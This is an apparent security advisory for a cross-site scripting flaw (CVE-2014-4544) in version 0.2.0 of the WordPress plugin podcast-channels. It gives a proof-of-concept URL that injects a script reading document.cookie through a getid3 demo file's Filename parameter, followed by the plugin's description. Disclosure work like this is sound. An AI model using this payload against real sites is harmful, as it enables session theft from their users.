wp-plugin : podcast-channels – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : podcast-channels

 

Effected Version : 0.2.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-22

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4544

 
Plugin Description :
 
What do you need to podcast with Wordpress? Nothing -- Wordpress puts enclosures in the feed for you. That's the bare bones and it works well enough.

But iTunes metadata would be nice. And, how about different info in different categories? Podcast Channels lets you specify iTunes metadata for the home feed, specific category feeds, and even 'user defined' ('Conditional') feeds (see the FAQ).

= Setting up Category Channels =
Go to the 'Media > Podcast Channels' page to set up the Site Defaults (it's 'Manage > Podcast Channels' for pre-2.7 WP). If you are not happy with the defaults shown in grey, click in the fields to set your own. If you want the main blog page feed to use this data, tick the 'add to Home Feed' option.

To add a podcast channel, choose a blog category from the drop-down menu and click 'Add Category Channel'. When the new channel pops up, there is an 'Add field...' drop-down menu in it that lets you specify defaults for this channel that over-ride the site defaults.

Leave a field undefined/blank or the same as the default and it will be removed from the channel definition - which means the value reverts to the site default.

= Fields that don't inherit =
Two fields are channel specific and do not inherit from the site defaults:

'Feed Moving To' is used to tell your podcast users (and the iTunes directory) that the podcast channel is moving to a new URL.

'Feedburner URL' redirects everyone (except the Feedburner site!) to a Feedurner URL so that they can collect stats for you.

= Audio Files in the Media Library =
When you upload an audio file, Podcast Channels adds 'Artist', 'Duration' and 'Explicit' fields to the Media Library. It initially fills in the artist and duration with the information found in the ID3 tags, but you are free to edit the fields.

Remember to set the explicit flag to 'Yes' if the content is not suitable for children. Apple are likely to de-list your podcast from the iTunes directory if you do not.


= Copyright and Image =
Podcast Channels adds image and copyright info to all your feeds if you specify it in the extra fields in 'Settings > General' (see screenshots).

Leave a Reply

Your email address will not be published. Required fields are marked *